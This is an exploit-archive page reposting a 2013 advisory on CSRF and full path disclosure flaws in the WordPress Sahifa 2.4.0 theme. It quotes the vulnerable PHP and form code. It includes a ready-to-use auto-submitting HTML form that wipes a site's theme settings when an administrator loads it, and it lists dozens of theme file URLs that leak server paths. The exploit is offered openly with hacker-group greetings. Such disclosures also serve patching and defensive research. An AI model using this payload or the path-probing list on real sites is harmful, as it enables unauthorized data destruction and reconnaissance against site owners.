Twenty Year Anniversary

WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure

WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure
Posted Jan 1, 2013
Authored by Akastep

WordPress Sahifa theme version 2.4.0 suffers from cross site request forgery and path disclosure vulnerabilities.

tags | exploit, vulnerability, file inclusion, info disclosure, csrf
MD5 | 0cc459c56ba3a7034c963b989f9f275b

WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

============================================
Software: Wordpress Sahifa theme Version: 2.4.0
Vendor: http://themes.tielabs.com/
Software License: Shareware *cost $45*
Vulnerabilities: This software is prone to CSRF and FULL PATH DISCLOSURE vulnerabilities.
============================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
============================================

[*] CSRF VULNERABILITY [*]


The following CSRF exploit on successfully exploitation will "reset" site settings.
Be Careful: It will lead to data destruction (you will lost your site settings)

Here is that vulnerable code sections:

File: panel/mpanel-ui.php
==SECTION 1=========BEGIN SNIP=================

<form method="post">
<div class="mpanel-reset">
<input name="reset" class="mpanel-reset-button" type="submit"
onClick="if(confirm('All settings will be rest .. Are you sure ?')) return true ; else return false; " value="Reset Settings" />
<input type="hidden" name="action" value="reset" />
</div>
</form>
=================== END SNIP =====================


File: panel/mpanel-functions.php

===SECTION 2=======BEGIN SNIP===================

if( isset( $_REQUEST['action'] ) ){
if( 'reset' == $_REQUEST['action'] ) {
global $default_data;
tie_save_settings( $default_data );
header("Location: admin.php?page=panel&reset=true");
die;
}
}
=============== END SNIP =====================




============ BEGIN CSRF EXPLOIT ============
<h1>Wordpress sahifa theme CSRF exploit By AkaStep<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://hacker1.own/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
</form>

============ END OF CSRF EXPLOIT ============



[*] FULL PATH DISCLOSURE: [*]

Just Direct access:


http://hacker1.own/wp/wp-content/themes/sahifa/category.php

Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/category.php on line 1

Other files also disclosures similar info.

Here is that files:

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/shortcode.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php?page[]=

Warning: htmlentities() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php on line 2

http://hacker1.own/wp/wp-content/themes/sahifa/panel/post-options.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/notifier/update-notifier.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/custom-slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/mpanel-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar-footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/author.php

http://hacker1.own/wp/wp-content/themes/sahifa/index.php
Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/index.php on line 1

http://hacker1.own/wp/wp-content/themes/sahifa/search.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/comments.php
http://hacker1.own/wp/wp-content/themes/sahifa/archive.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/widgetize-theme.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/common-scripts.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/theme-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/updates.php
http://hacker1.own/wp/wp-content/themes/sahifa/page.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-sitemap.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-tags.php
http://hacker1.own/wp/wp-content/themes/sahifa/single.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-related.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-news-pic.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-google.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-custom-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-posts.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-text-html.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-feedburner.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-ads.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-flickr.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-video.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-tabbed.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-search.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-social.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-twitter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-facebook.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-reviews.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-counter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-comments-avatar.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-head.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-meta.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/single-post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/breaking-news.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-timeline.php
http://hacker1.own/wp/wp-content/themes/sahifa/loop.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-feed.php
http://hacker1.own/wp/wp-content/themes/sahifa/tag.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-restrict.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-blog.php
http://hacker1.own/wp/wp-content/themes/sahifa/404.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-authors.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar.php

=========================== HAPPY NEW YEAR! ==================================


================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    6 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    8 Files
  • 23
    May 23rd
    53 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close